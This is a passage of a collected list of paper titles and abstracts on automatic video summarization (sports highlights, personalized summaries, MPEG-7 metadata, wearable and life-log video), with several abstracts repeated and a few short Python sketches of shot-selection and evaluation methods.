develop formal definitions of all these concepts and provide algorithms to find optimal summaries. 
We briefly report on the performance of these algorithms. --- paper_title: Framework for personalized multimedia summarization paper_content: We extend and validate methods of personalization to the domain of automatically created multimedia summaries. Based on a previously performed user study of 59 people we derived a mapping of personality profile information to preferred multimedia features. This article describes our summarization algorithm. We define constraints for automatic summary generation. Summaries should consist of contiguous segments of full shots, with duration proportional to the log of video length, selected by an objective function of total "importance" of features, with heuristic rules for deciding the "best" combination of length and importance. We validated the summaries with a user study of 32 people. They were asked to answer a shortened series of personality queries. Using this current user profile, together with the earlier genre-specific reduced mapping and with automatically derived features, we automatically generated two summaries for each video: one optimally matched, and one matched to the "opposite" personality. Each user evaluated both summaries on a preference scale for four each of: news, talk show, and music videos. From a statistical analysis we find statistically significant evidence of the effectiveness of personalization on news and music videos, with no evidence of user subpopulations. We conclude for these genres that our claim, of a universal mapping from certain measured personality traits to the computable creation of preferred multimedia summaries, is supported. --- paper_title: Efficient access to video content in a unified framework paper_content: Book contents' browsing and retrieval have been greatly facilitated by its Table-of-Contents (ToC) and Index, respectively. Unfortunately, today's video lacks such powerful mechanisms. In this paper, we explore and present novel techniques for constructing video ToC and Index. Furthermore, we explore the relationship between video browsing and retrieval and propose a unified framework: to incorporate both entities in a seamless way. Experimental results on real-world video clips justify our proposed framework for providing efficient access to video content. --- paper_title: Video Summarization for Large Sports Video Archives paper_content: Video summarization is defined as creating a shorter video clip or a video poster which includes only the important scenes in the original video streams. In this paper, we propose two methods of generating a summary of arbitrary length for large sports video archives. One is to create a concise video clip by temporally compressing the amount of the video data. The other is to provide a video poster by spatially presenting the image keyframes which together represent the whole video content. Our methods deal with the metadata which has semantic descriptions of video content. Summaries are created according to the significance of each video segment which is normalized in order to handle large sports video archives. We experimentally verified the effectiveness of our methods by comparing the results with man-made video summaries --- paper_title: The priority curve algorithm for video summarization paper_content: In this paper, we introduce the concept of a priority curve associated with a video. We then provide an algorithm that can use the priority curve to create a summary (of a desired length) of any video. 
The summary thus created exhibits nice continuity properties and also avoids repetition. We have implemented the priority curve algorithm (PCA) and compared it with other summarization algorithms in the literature. We show that PCA is faster than existing algorithms and also produces better quality summaries. The quality of summaries was evaluated by a group of 200 students in Naples, Italy, who watched soccer videos. We also briefly describe a soccer video summarization system we have built on using the PCA architecture and various (classical) image processing algorithms. --- paper_title: Automatically extracting highlights for TV Baseball programs paper_content: In today's fast-paced world, while the number of channels of television programming available is increasing rapidly, the time available to watch them remains the same or is decreasing. Users desire the capability to watch the programs time-shifted (on-demand) and/or to watch just the highlights to save time. In this paper we explore how to provide for the latter capability, that is the ability to extract highlights automatically, so that viewing time can be reduced. We focus on the sport of baseball as our initial target—it is a very popular sport, the whole game is quite long, and the exciting portions are few. We focus on detecting highlights using audio-track features alone without relying on expensive-to-compute video-track features. We use a combination of generic sports features and baseball-specific features to obtain our results, but believe that may other sports offer the same opportunity and that the techniques presented here will apply to those sports. We present details on relative performance of various learning algorithms, and a probabilistic framework for combining multiple sources of information. We present results comparing output of our algorithms against human-selected highlights for a diverse collection of baseball games with very encouraging results. --- paper_title: Sequential association mining for video summarization paper_content: In this paper, we propose an association-based video summarization scheme that mines sequential associations from video data for summary creation. Given detected shots of video V, we first cluster them into visually distinct groups, and then construct a sequential sequence by integrating the temporal order and cluster type of each shot. An association mining scheme is designed to mine sequentially associated clusters from the sequence, and these clusters are selected as summary candidates. With a user specified summary length, our system generates the corresponding summary by selecting representative frames from candidate clusters and assembling them by their original temporal order. The experimental evaluation demonstrates the effectiveness of our summarization method. --- paper_title: Automatic generation of video summaries for historical films paper_content: A video summary is a sequence of video clips extracted from a longer video. Much shorter than the original, the summary preserves its essential messages. In the ECHO (European Chronicles On-line) project, a system was developed to store and manage large collections of historical films for the preservation of cultural heritage. At the University of Mannheim, we have developed the video summarization component of the ECHO system. 
We discuss the particular challenges the historical film material poses, and how we have designed new video processing algorithms and modified existing ones to cope with noisy black-and-white films. --- paper_title: VSUM: summarizing from videos paper_content: Summarization of produced video data (like news or movies) aims to find the important segments that contain rich information. Users could obtain the important messages by reading summaries rather than full documents. The research in this area can be divided into two parts: (1) the image processing (IP) perspective, and (2) the NLP (natural language processing) perspective. The former puts emphasis on the detection of key frames, while the latter focuses on the extraction of important concepts. This paper proposes a video summarization system, VSUM. VSUM first identifies all caption words, and then adopts a technique to find the important segments. An external thesaurus is also used in VSUM to enhance the summary extraction process. The experimental results show that VSUM could perform well even if the accuracy of OCR (optical character recognition) is not high. --- paper_title: Video summarization and scene detection by graph modeling paper_content: We propose a unified approach for video summarization based on the analysis of video structures and video highlights. Two major components in our approach are scene modeling and highlight detection. Scene modeling is achieved by a normalized cut algorithm and temporal graph analysis, while highlight detection is accomplished by motion attention modeling. In our proposed approach, a video is represented as a complete undirected graph and the normalized cut algorithm is carried out to globally and optimally partition the graph into video clusters. The resulting clusters form a directed temporal graph and a shortest path algorithm is proposed to efficiently detect video scenes. The attention values are then computed and attached to the scenes, clusters, shots, and subshots in a temporal graph. As a result, the temporal graph can inherently describe the evolution and perceptual importance of a video. In our application, video summaries that emphasize both content balance and perceptual quality can be generated directly from a temporal graph that embeds both the structure and attention information. --- paper_title: Low cost soccer video summaries based on visual rhythm paper_content: The visual rhythm is a spatio-temporal sampled representation of video data providing compact information while preserving several types of video events. We exploit these properties in the present work to propose two new low-level descriptors for the analysis of soccer videos computed directly from the visual rhythm. The descriptors are related to dominant color and camera motion estimation. The new descriptors are applied in different tasks aimed at the analysis of soccer videos, such as shot transition detection, shot classification and attack direction estimation. We also present a simple automated soccer summary application to illustrate the use of the new descriptors. --- paper_title: Learning personalized video highlights from detailed MPEG-7 metadata paper_content: We present a new framework for generating personalized video digests from detailed event metadata. In the new approach, high-level semantic features (e.g., number of offensive events) are extracted from an existing metadata signal using time windows (e.g., features within 16 sec. intervals).
Personalized video digests are generated using a supervised learning algorithm which takes as input examples of important/unimportant events. Window-based features are extracted from the metadata and used to train the system and build a classifier that, given metadata for a new video, classifies segments into important and unimportant, according to a specific user, to generate personalized video digests. Our experimental results using soccer video suggest that extracting high level semantic information from existing metadata can be used effectively (80% precision and 85% recall using cross validation) in generating personalized video digests. --- paper_title: Video summarization based on the psychological unfolding of a drama paper_content: This paper proposes a method of composing digests of TV videos based on their psychological unfolding. Most of the studies of video summarization to date have been based on the video structure, such as cuts or objects in the video. It is generally considered, however, that the observer of a TV drama emphasizes instead the psychological unfolding of the video content (such as the climax). However, no method of summarizing a drama based on the psychological aspect of the video has been proposed. Track structures [such as cutting, lines spoken by the actors, BGM (background music), and sound effects] constitute physical components, and the dramatist skillfully manipulates the time structure based on his empirical knowledge in order to present a particular psychological impression. This paper proposes a method in which the psychologically important part is detected on the basis of empirical knowledge as a corresponding time-series pattern of the track structure, and a summarized video is generated. As an experiment, the proposed method was applied to a TV drama, and the time length was reduced to approximately 1/14. Subjective evaluation experiments show that the proposed method preserves the content of the main plot, with naturalness of extraction, thus indicating the usefulness of the proposed method. © 2002 Wiley Periodicals, Inc. Syst Comp Jpn, 33(11): 39–49, 2002; Published online in Wiley InterScience (www.interscience.wiley.com). DOI 10.1002/scj.10066 --- paper_title: The holy grail of content-based media analysis paper_content: Tools and systems for content-based access to multimedia (image, video, audio, graphics, text, and any number of combinations) have increased in the last decade. We've seen a common theme of developing automatic analysis techniques for deriving metadata (data describing information in the content at both syntactic and semantic levels). Such metadata facilitates developing innovative tools and systems for multimedia information retrieval, summarization, delivery, and manipulation. Many interesting demonstrations of potential applications and services have emerged: finding images visually similar to a chosen picture (or sketch); summarizing videos with thumbnails of keyframes; finding video clips of a specific event, story, or person; and producing a two-minute skim of an hour-long program. In order to evaluate content-based research methodologies, the article considers intended users, whether alternative solutions exist, and areas of research. --- paper_title: MSN: statistical understanding of broadcasted baseball video using multi-level semantic network paper_content: The information processing of sports video yields valuable semantics for content delivery over narrowband networks.
Traditional image/video processing is formulated in terms of low-level features describing image/video structure and intensity, while high-level knowledge such as common sense and human perceptual knowledge is encoded in abstract and nongeometric representations. The management of semantic information in video becomes more and more difficult because of the large difference in representations, levels of knowledge, and abstract episodes. This paper proposes a semantic highlight detection scheme using a Multi-level Semantic Network (MSN) for baseball video interpretation. The probabilistic structure can be applied for highlight detection and shot classification. Satisfactory results will be shown to illustrate better performance compared with the traditional ones. --- paper_title: Highlights for more complete sports video summarization paper_content: Summarization is an essential requirement for achieving a more compact and interesting representation of sports video contents. We propose a framework that integrates highlights into play segments and reveals why we should still retain breaks. Experimental results show that fast detection of whistle sounds, crowd excitement, and text boxes can complement existing techniques for play-break and highlight localization. --- paper_title: MINMAX optimal video summarization paper_content: The need for video summarization originates primarily from a viewing time constraint. A shorter version of the original video sequence is desirable in a number of applications. Clearly, a shorter version is also necessary in applications where storage, communication bandwidth and/or power are limited. In this paper, our work is based on a MINMAX optimization formulation with viewing time, frame skip and bit rate constraints. New metrics for missing frame and video summary distortions are introduced. An optimal algorithm based on dynamic programming is presented along with experimental results. --- paper_title: Interface Design for MyInfo: a Personal News Demonstrator Combining Web and TV Content paper_content: This paper describes MyInfo, a novel interface for a personal news demonstrator that processes and combines content from TV and the web. We detail our design process from concept generation to focus group exploration to final design. Our design focuses on three issues: (i) ease-of-use, (ii) video summarization, and (iii) news personalization. With a single button press on the remote control, users access specific topics such as weather or traffic. In addition, users can play back personalized news content as a TV show, leaving themselves free to complete other tasks in their homes, while consuming the news.
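At their core, several of the optimization-based formulations collected here (the CPR model, the priority curve algorithm, and the MINMAX formulation above) select segments that maximize an importance objective under a viewing-time budget. The sketch below shows that core selection step as a standard 0/1 knapsack dynamic program in Python. It is a generic illustration over assumed per-shot durations and importance scores, not the exact algorithm of any cited paper, which typically adds continuity, non-repetition, or distortion terms on top of this step.

```python
from typing import List, Tuple

def select_shots(durations: List[int], importance: List[float],
                 budget: int) -> Tuple[float, List[int]]:
    """Pick a subset of shots maximizing total importance within a duration budget.

    Durations are whole seconds; returns (best score, chosen shot indices).
    """
    n = len(durations)
    dp = [0.0] * (budget + 1)                       # dp[t]: best importance with duration <= t
    choice = [[False] * (budget + 1) for _ in range(n)]
    for i in range(n):
        for t in range(budget, durations[i] - 1, -1):
            candidate = dp[t - durations[i]] + importance[i]
            if candidate > dp[t]:
                dp[t] = candidate
                choice[i][t] = True
    # Backtrack to recover the selected shots, then report them in temporal order.
    selected, t = [], budget
    for i in range(n - 1, -1, -1):
        if choice[i][t]:
            selected.append(i)
            t -= durations[i]
    return dp[budget], sorted(selected)

if __name__ == "__main__":
    durations = [12, 30, 8, 25, 15]          # seconds per shot (assumed values)
    importance = [0.9, 0.4, 0.7, 0.8, 0.3]   # e.g., from highlight or attention scores
    print(select_shots(durations, importance, budget=45))
```

Continuity and non-repetition constraints of the kind used in the CPR and priority curve formulations can be layered on top of this step, for example by penalizing temporal gaps or near-duplicate shots in the objective.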
--- paper_title: From context to content: leveraging context to infer media metadata paper_content: The recent popularity of mobile camera phones allows for new opportunities to gather important metadata at the point of capture. This paper describes a method for generating metadata for photos using spatial, temporal, and social context. We describe a system we implemented for inferring location information for pictures taken with camera phones and its performance evaluation. We propose that leveraging contextual metadata at the point of capture can address the problems of the semantic and sensory gaps. In particular, combining and sharing spatial, temporal, and social contextual metadata from a given user and across users allows us to make inferences about media content. --- paper_title: Context and memory in multimedia content analysis paper_content: With the advent of broadband networking, video will be available online as well as through traditional distribution channels. The merging of entertainment and information media makes video content classification and retrieval a necessary tool. To provide fast retrieval, content management systems must discern between categories of video. Automatic multimedia analysis techniques for deriving high-level descriptions and annotations have experienced a tremendous surge in interest. Academia and industry have also been challenged to develop realistic applications-from home media library organizers and multimedia lecture archives to broadcast TV content navigators and video-on-demand-in pursuit of the killer application. Current content classification technologies have undoubtedly emerged from traditional image processing and computer vision, audio analysis and processing, and information retrieval. Although terminology varies, the algorithms generally fall into three categories: tangible detectors, high-level abstractors, and latent or intangible descriptors. This paper presents the reflections of the work done by the author and the work ahead. --- paper_title: Video summarization: methods and landscape paper_content: The ability to summarize and abstract information will be an essential part of intelligent behavior in consumer devices. Various summarization methods have been the topic of intensive research in the content-based video analysis community. Summarization in traditional information retrieval is a well understood problem. While there has been a lot of research in the multimedia community there is no agreed upon terminology and classification of the problems in this domain. Although the problem has been researched from different aspects there is usually no distinction between the various dimensions of summarization. The goal of the paper is to provide the basic definitions of widely used terms such as skimming, summarization, and highlighting. The different levels of summarization: local, global, and meta-level are made explicit. We distinguish among the dimensions of task, content, and method and provide an extensive classification model for the same. We map the existing summary extraction approaches in the literature into this model and we classify the aspects of proposed systems in the literature. In addition, we outline the evaluation methods and provide a brief survey. Finally we propose future research directions based on the white spots that we identified by analysis of existing systems in the literature. 
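On the evaluation side, two objective measures recur throughout this literature (the Fidelity and Compression Ratio measures mentioned in the first entry of this section, and the evaluation methods outlined in the landscape survey above) and are simple to state: the compression ratio relates summary length to original length, while fidelity-type scores penalize the largest gap between any original frame and its nearest key frame. The snippet below gives one common formulation, assuming a mean-absolute-difference frame distance; the exact definitions and normalizations used in the cited works may differ.

```python
import numpy as np

def frame_distance(a, b):
    """Mean absolute gray-level difference; a stand-in for any frame dissimilarity."""
    return float(np.abs(a.astype(float) - b.astype(float)).mean())

def compression_ratio(n_key_frames, n_frames):
    """Fraction of the original sequence removed by the summary."""
    return 1.0 - n_key_frames / n_frames

def semi_hausdorff_gap(frames, key_frames):
    """Largest distance from any original frame to its nearest key frame.

    Fidelity-style measures report a score that decreases as this gap grows;
    smaller gaps mean the key frames cover the sequence better.
    """
    return max(min(frame_distance(f, k) for k in key_frames) for f in frames)

if __name__ == "__main__":
    rng = np.random.default_rng(2)
    frames = [rng.integers(0, 256, (32, 32)) for _ in range(50)]
    key_frames = [frames[0], frames[25], frames[49]]
    print("compression ratio:", compression_ratio(len(key_frames), len(frames)))
    print("semi-Hausdorff gap:", semi_hausdorff_gap(frames, key_frames))
```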
--- paper_title: Evaluation of video summarization for a large number of cameras in ubiquitous home paper_content: A system for video summarization in a ubiquitous environment is presented. Data from pressure-based floor sensors are clustered to segment footsteps of different persons. Video handover has been implemented to retrieve a continuous video showing a person moving in the environment. Several methods for extracting key frames from the resulting video sequences have been implemented, and evaluated by experiments. It was found that most of the key frames the human subjects desire to see could be retrieved using an adaptive algorithm based on camera changes and the number of footsteps within the view of the same camera. The system consists of a graphical user interface that can be used to retrieve video summaries interactively using simple queries. --- paper_title: Video Summarization for Large Sports Video Archives paper_content: Video summarization is defined as creating a shorter video clip or a video poster which includes only the important scenes in the original video streams. In this paper, we propose two methods of generating a summary of arbitrary length for large sports video archives. One is to create a concise video clip by temporally compressing the amount of the video data. The other is to provide a video poster by spatially presenting the image keyframes which together represent the whole video content. Our methods deal with the metadata which has semantic descriptions of video content. Summaries are created according to the significance of each video segment which is normalized in order to handle large sports video archives. We experimentally verified the effectiveness of our methods by comparing the results with man-made video summaries --- paper_title: Learning personalized video highlights from detailed MPEG-7 metadata paper_content: We present a new framework for generating personalized video digests from detailed event metadata. In the new approach high level semantic features (e.g., number of offensive events) are extracted from an existing metadata signal using time windows (e.g., features within 16 sec. intervals). Personalized video digests are generated using a supervised learning algorithm which takes as input examples of important/unimportant events. Window-based features are extracted from the metadata and used to train the system and build a classifier that, given metadata for a new video, classifies segments into important and unimportant, according to a specific user, to generate personalized video digests. Our experimental results using soccer video suggest that extracting high level semantic information from existing metadata can be used effectively (80% precision and 85% recall using cross validation) in generating personalized video digests. --- paper_title: Evaluation of video summarization for a large number of cameras in ubiquitous home paper_content: A system for video summarization in a ubiquitous environment is presented. Data from pressure-based floor sensors are clustered to segment footsteps of different persons. Video handover has been implemented to retrieve a continuous video showing a person moving in the environment. Several methods for extracting key frames from the resulting video sequences have been implemented, and evaluated by experiments. 
--- paper_title: Optimizing user expectations for video semantic filtering and abstraction paper_content: We describe a novel automatic system that generates personalized videos based on semantic filtering or summarization techniques. This system uses a new set of more than one hundred visual semantic detectors that automatically detect video concepts in faster than real time. Based on personal profiles, the system generates either video summaries from video databases or filtered video contents from live broadcasting videos. The prototype experiments have shown the effectiveness and stability of the system. --- paper_title: Semantic video summarization in compressed domain MPEG video paper_content: In this paper, we present a semantic summarization algorithm that interfaces with the metadata and that works in compressed domain, in particular MPEG-1 and MPEG-2 videos. In enabling a summarization algorithm through high-level semantic content, we try to address two major problems. First, we present the facility provided in the DVA system that allows the semi-automatic creation of this metadata.
Second, we address the main point of this system, which is the utilization of this metadata to filter out frames, creating an abstract of a video. A summary quality survey indicates that the proposed method performs satisfactorily. --- paper_title: Personalized abstraction of broadcasted American football video by highlight selection paper_content: Video abstraction is defined as creating shorter video clips or video posters from an original video stream. In this paper, we propose a method of generating a personalized abstract of broadcasted American football video. We first detect significant events in the video stream by matching textual overlays appearing in an image frame with the descriptions of gamestats in which highlights of the game are described. Then, we select highlight shots which should be included in the video abstract from those detected events reflecting on their significance degree and personal preferences, and generate a video clip by connecting the shots augmented with related audio and text. An hour-length video can be compressed into a minute-length personalized abstract. We experimentally verified the effectiveness of this method by comparing it with man-made video abstracts. --- paper_title: Automatic video summarizing tool using MPEG-7 descriptors for personal video recorder paper_content: We introduce an automatic video summarizing tool (AVST) for a personal video recorder. The tool utilizes MPEG-7 visual descriptors to generate a video index for a summary. The resulting index generates not only a preview of a movie but also allows non-linear access with thumbnails. In addition, the index supports the searching of shots similar to a desired one within saved video sequences. Moreover, simple shot-based video editing can readily be achieved using the generated index. --- paper_title: Personalized video summary using visual semantic annotations and automatic speech transcriptions paper_content: A personalized video summary is dynamically generated in our video personalization and summary system based on user preference and usage environment. The three-tier personalization system adopts the server-middleware-client architecture in order to maintain, select, adapt, and deliver rich media content to the user. The server stores the content sources along with their corresponding MPEG-7 metadata descriptions. In this paper, the metadata includes visual semantic annotations and automatic speech transcriptions. Our personalization and summarization engine in the middleware selects the optimal set of desired video segments by matching shot annotations and sentence transcripts with user preferences. The process includes the shot-to-sentence alignment, summary segment selection, and user preference matching and propagation. As a result, the relevant visual shot and audio sentence segments are aggregated and composed into a personalized video summary. --- paper_title: Media content and type selection from always-on wearable video paper_content: A system is described for summarizing head-mounted or hand-carried "always-on" video. The example used is a tourist walking around a historic city with friends and family. The summary consists of a mixture of stills, panoramas and video clips. The system identifies both the scenes to appear in the summary and the media type used to represent them. As there are few shot boundaries in this class of video, the decisions are based on the system's classification of the user's behaviour demonstrated by the motion of the camera, and motion in the scene.
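The broadcast American football abstraction a few entries above selects highlight shots by significance and personal preference before assembling a clip of a target length. The sketch below illustrates only that selection step, under assumed data (shot times, event types, significance scores, and preference weights); it is not the system described in the paper.

```python
# Hypothetical detected highlight shots: (start_s, end_s, event_type, significance 0..1)
shots = [
    (12.0, 20.0, "touchdown",    0.95),
    (40.0, 46.0, "interception", 0.80),
    (70.0, 75.0, "field_goal",   0.60),
    (90.0, 94.0, "punt",         0.30),
]
preferences = {"touchdown": 1.0, "interception": 0.9, "field_goal": 0.7, "punt": 0.2}
BUDGET = 15.0  # target abstract length in seconds (arbitrary choice)

def select_highlights(shots, preferences, budget):
    """Greedy selection: highest preference-weighted significance per second first."""
    ranked = sorted(
        shots,
        key=lambda s: preferences.get(s[2], 0.0) * s[3] / (s[1] - s[0]),
        reverse=True,
    )
    chosen, used = [], 0.0
    for start, end, etype, sig in ranked:
        dur = end - start
        if used + dur <= budget:
            chosen.append((start, end, etype))
            used += dur
    return sorted(chosen)  # restore temporal order for playback

print(select_highlights(shots, preferences, BUDGET))
```

A greedy value-density rule is only one plausible way to trade off significance against the duration budget; the paper's own selection criteria may differ.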
--- paper_title: Video summarization based on user log enhanced link analysis paper_content: Efficient video data management calls for intelligent video summarization tools that automatically generate concise video summaries for fast skimming and browsing. Traditional video summarization techniques are based on low-level feature analysis, which generally fails to capture the semantics of video content. Our vision is that users unintentionally embed their understanding of the video content in their interaction with computers. This valuable knowledge, which is difficult for computers to learn autonomously, can be utilized for video summarization process. In this paper, we present an intelligent video browsing and summarization system that utilizes previous viewers' browsing log to facilitate future viewers. Specifically, a novel ShotRank notion is proposed as a measure of the subjective interestingness and importance of each video shot. A ShotRank computation framework is constructed to seamlessly unify low-level video analysis and user browsing log mining. The resulting ShotRank is used to organize the presentation of video shots and generate video skims. Experimental results from user studies have strongly confirmed that ShotRank indeed represents the subjective notion of interestingness and importance of each video shot, and it significantly improves future viewers' browsing experience. --- paper_title: Tennis video abstraction from audio and visual cues paper_content: We propose a context-based model of video abstraction exploiting both audio and video features and applied to tennis TV programs. We can automatically produce different types of summary of a given video depending on the users' constraints or preferences. We have first designed an efficient and accurate temporal segmentation of the video into segments homogeneous w.r.t the camera motion. We introduce original visual descriptors related to the dominant and residual image motions. The different summary types are obtained by specifying adapted classification criteria which involve audio features to select the relevant segments to be included in the video abstract. The proposed scheme has been validated on 22 hours of tennis videos. --- paper_title: Design and evaluation of a music video summarization system paper_content: We present a system that summarizes the textual, audio, and video information of music videos in a format tuned to the preferences of a focus group of 20 users. First, we analyzed user-needs for the content and the layout of the music summaries. Then, we designed algorithms that segment individual song videos from full music video programs by noting changes in color palette, transcript, and audio classification. We summarize each song with automatically selected high level information such as title, artist, duration, title frame, and text as well as audio and visual segments of the chorus. Our system automatically determines with high recall and precision chorus locations, from the placement of repeated words and phrases in the text of the song's lyrics. Our Bayesian belief network then selects other significant video and audio content from the multiple media. Overall, we are able to compress content by a factor of 10. Our second user study has identified the principal variations between users in their choices of content desired in the summary, and in their choices of the platforms that should support their viewing. 
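ShotRank, introduced in the user-log entry above, scores shots with a link-analysis computation over viewers' browsing behaviour. Below is a minimal power-iteration sketch; the shot-to-shot jump counts standing in for the mined browsing log, the damping factor, and the iteration count are all invented for illustration.

```python
import numpy as np

# Hypothetical browsing log mined into shot-to-shot jump counts (row -> column).
jumps = np.array([
    [0, 4, 1, 0],
    [2, 0, 5, 1],
    [1, 3, 0, 6],
    [0, 1, 2, 0],
], dtype=float)

def shot_rank(jumps, damping=0.85, iters=100):
    """PageRank-style score per shot computed from a jump-count matrix."""
    n = len(jumps)
    row_sums = jumps.sum(axis=1, keepdims=True)
    row_sums[row_sums == 0] = 1.0        # dangling rows: avoid divide-by-zero
    P = jumps / row_sums                 # row-stochastic transition matrix
    r = np.full(n, 1.0 / n)
    for _ in range(iters):
        r = (1 - damping) / n + damping * (P.T @ r)
    return r / r.sum()

ranks = shot_rank(jumps)
print("ShotRank:", np.round(ranks, 3), "-> skim order:", np.argsort(-ranks))
```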
--- paper_title: Auto-summarization of audio-video presentations paper_content: As streaming audio-video technology becomes widespread, there is a dramatic increase in the amount of multimedia content available on the net. Users face a new challenge: How to examine large amounts of multimedia content quickly. One technique that can enable quick overview of multimedia is video summaries; that is, a shorter version assembled by picking important segments from the original. We evaluate three techniques for automatic creation of summaries for online audio-video presentations. These techniques exploit information in the audio signal (e.g., pitch and pause information), knowledge of slide transition points in the presentation, and information about access patterns of previous users. We report a user study that compares automatically generated summaries that are 20%-25% the length of full presentations to author generated summaries. Users learn from the computer-generated summaries, although less than from authors' summaries. They initially find computer-generated summaries less coherent, but quickly grow accustomed to them. --- paper_title: Summarizing wearable video paper_content: "We want to record our entire life by video" is the motivation of this research. Developing wearable devices and huge storage devices will make it possible to keep entire life by video. We could capture 70 years of our life, however, the problem is how to handle such a huge amount of data. Automatic summarization based on personal interest should be required. In this paper we propose an approach to the automatic structuring and summarization of wearable video. (Wearable video is our abbreviation of "video captured by a wearable camera".) In our approach, we make use of a wearable camera and a sensor of brain waves. The video is firstly structured by objective features of video, and the shots are rated by subjective measures based on brain waves. The approach is very successful for real world experiments and it automatically extracted all the events that the subjects reported they had felt interesting. --- paper_title: Dynamic video summarization of home video paper_content: An increasing number of people own and use camcorders to make videos that capture their experiences and document their lives. These videos easily add up to many hours of material. Oddly, most of them are put into a storage box and never touched or watched again. The reasons for this are manifold. Firstly, the raw video material is unedited, and is therefore long-winded and lacking visually appealing effects. Video editing would help, but, it is still too time-consuming; people rarely find the time to do it. Secondly, watching the same tape more than a few times can be boring, since the video lacks any variation or surprise during playback. Automatic video abstracting algorithms can provide a method for processing videos so that users will want to play the material more often. However, existing automatic abstracting algorithms have been designed for feature films, newscasts or documentaries, and thus are inappropriate for home video material and raw video footage in general. In this paper, we present new algorithms for generating amusing, visually appealing and variable video abstracts of home video material automatically. They make use of a new, empirically motivated approach, also presented in the paper, to cluster time-stamped shots hierarchically into meaningful units. 
Last but not least, we propose a simple and natural extension of the way people acquire video - so-called on-the-fly annotations - which will allow a completely new set of applications on raw video footage as well as enable better and more selective automatic video abstracts. Moreover, our algorithms are not restricted to home video but can also be applied to raw video footage in general. --- paper_title: Efficient retrieval of life log based on context and content paper_content: In this paper, we present continuous capture of our life log with various sensors plus additional data and propose effective retrieval methods using this context and content. Our life log system contains video, audio, acceleration sensor, gyro, GPS, annotations, documents, web pages, and emails. In our previous studies, we showed our retrieval methodology [8], [9], which mainly depends on context information from sensor data. In this paper, we extend our methodology with additional functions. They are (1) spatio-temporal sampling for extraction of key frames for summarization; and (2) conversation scene detection. With the first of these, key frames for the summarization are extracted using time and location data (GPS). Because our life log captures dense location data, we can also make use of derivatives of location data, that is, speed and acceleration in the movement of the person. The summarizing key frames are made using them. We also introduce content analysis for conversation scene detection. In our previous work, we have investigated context-based retrieval, which differs from the majority of studies in image/video retrieval focusing on content-based retrieval. In this paper, we introduce visual and audio data content analysis for conversation scene detection. The detection of conversation scenes will be very important tags for our life log data retrieval. We describe our present system and additional functions, as well as preliminary results for the additional functions. --- paper_title: VideoQA: question answering on news video paper_content: When querying a news video archive, the users are interested in retrieving precise answers in the form of a summary that best answers the query. However, current video retrieval systems, including the search engines on the web, are designed to retrieve documents instead of precise answers. This research explores the use of question answering (QA) techniques to support personalized news video retrieval. Users interact with our system, VideoQA, using short natural language questions with implicit constraints on contents, context, duration, and genre of expected videos. VideoQA returns short precise news video summaries as answers. The main contributions of this research are: (a) the extension of QA technology to support QA in news video; and (b) the use of multi-modal features, including visual, audio, textual, and external resources, to help correct speech recognition errors and to perform precise question answering. The system has been tested on 7 days of news video and has been found to be effective. --- paper_title: Using MPEG-7 and MPEG-21 for personalizing video paper_content: As multimedia content has proliferated over the past several years, users have begun to expect that content be easily accessed according to their own preferences. 
One of the most effective ways to do this is through using the MPEG-7 and MPEG-21 standards, which can help address the issues associated with designing a video personalization and summarization system in heterogeneous usage environments. This three-tier architecture provides a standards-compliant infrastructure that, in conjunction with our tools, can help select, adapt, and deliver personalized video summaries to users. In extending our summarization research, we plan to explore semantic similarities across multiple simultaneous news media sources and to abstract summaries for different viewpoints. Doing so will allow us to track a semantic topic as it evolves into the future. As a result, we should be able to summarize news repositories into a smaller collection of topic threads. --- paper_title: The CPR model for summarizing video paper_content: Most past work on video summarization has been based on selecting key frames from videos. We propose a model of video summarization based on three important parameters: Priority (of frames), Continuity (of the summary), and non-Repetition (of the summary). In short, a summary must include high priority frames, must be continuous and non-repetitive. An optimal summary is one that maximizes an objective function based on these three parameters. We develop formal definitions of all these concepts and provide algorithms to find optimal summaries. We briefly report on the performance of these algorithms. --- paper_title: Framework for personalized multimedia summarization paper_content: We extend and validate methods of personalization to the domain of automatically created multimedia summaries. Based on a previously performed user study of 59 people we derived a mapping of personality profile information to preferred multimedia features. This article describes our summarization algorithm. We define constraints for automatic summary generation. Summaries should consist of contiguous segments of full shots, with duration proportional to the log of video length, selected by an objective function of total "importance" of features, with heuristic rules for deciding the "best" combination of length and importance. We validated the summaries with a user study of 32 people. They were asked to answer a shortened series of personality queries. Using this current user profile, together with the earlier genre-specific reduced mapping and with automatically derived features, we automatically generated two summaries for each video: one optimally matched, and one matched to the "opposite" personality. Each user evaluated both summaries on a preference scale for four each of: news, talk show, and music videos. From a statistical analysis we find statistically significant evidence of the effectiveness of personalization on news and music videos, with no evidence of user subpopulations. We conclude for these genres that our claim, of a universal mapping from certain measured personality traits to the computable creation of preferred multimedia summaries, is supported. --- paper_title: Efficient access to video content in a unified framework paper_content: Book contents' browsing and retrieval have been greatly facilitated by its Table-of-Contents (ToC) and Index, respectively. Unfortunately, today's video lacks such powerful mechanisms. In this paper, we explore and present novel techniques for constructing video ToC and Index. 
Furthermore, we explore the relationship between video browsing and retrieval and propose a unified framework: to incorporate both entities in a seamless way. Experimental results on real-world video clips justify our proposed framework for providing efficient access to video content. --- paper_title: The priority curve algorithm for video summarization paper_content: In this paper, we introduce the concept of a priority curve associated with a video. We then provide an algorithm that can use the priority curve to create a summary (of a desired length) of any video. The summary thus created exhibits nice continuity properties and also avoids repetition. We have implemented the priority curve algorithm (PCA) and compared it with other summarization algorithms in the literature. We show that PCA is faster than existing algorithms and also produces better quality summaries. The quality of summaries was evaluated by a group of 200 students in Naples, Italy, who watched soccer videos. We also briefly describe a soccer video summarization system we have built on using the PCA architecture and various (classical) image processing algorithms. --- paper_title: Video summarization based on the psychological unfolding of a drama paper_content: This paper proposes a method of composing digests of TV videos based on their psychological unfolding. Most of the studies of video summarization to date have been based on the video structure, such as cuts or objects in the video. It is generally considered, however, that the observer of a TV drama emphasizes instead the psychological unfolding of the video content (such as the climax). However, no method of summarizing a drama based on the psychological aspect of the video has been proposed. Track structures [such as cutting, lines spoken by the actors, BGM (background music), and sound effects] constitute physical components, and the dramatist skillfully manipulates the time structure based on his empirical knowledge in order to present a particular psychological impression. This paper proposes a method in which the psychologically important part is detected on the basis of empirical knowledge as a corresponding time-series pattern of the track structure, and a summarized video is generated. As an experiment, the proposed method was applied to a TV drama, and the time length was reduced to approximately 1/14. Subjective evaluation experiments show that the proposed method preserves the content of the main plot, with naturalness of extraction, thus indicating the usefulness of the proposed method. © 2002 Wiley Periodicals, Inc. Syst Comp Jpn, 33(11): 39–49, 2002; Published online in Wiley InterScience (www.interscience.wiley.com). DOI 10.1002/scj.10066 --- paper_title: Highlights for more complete sports video summarization 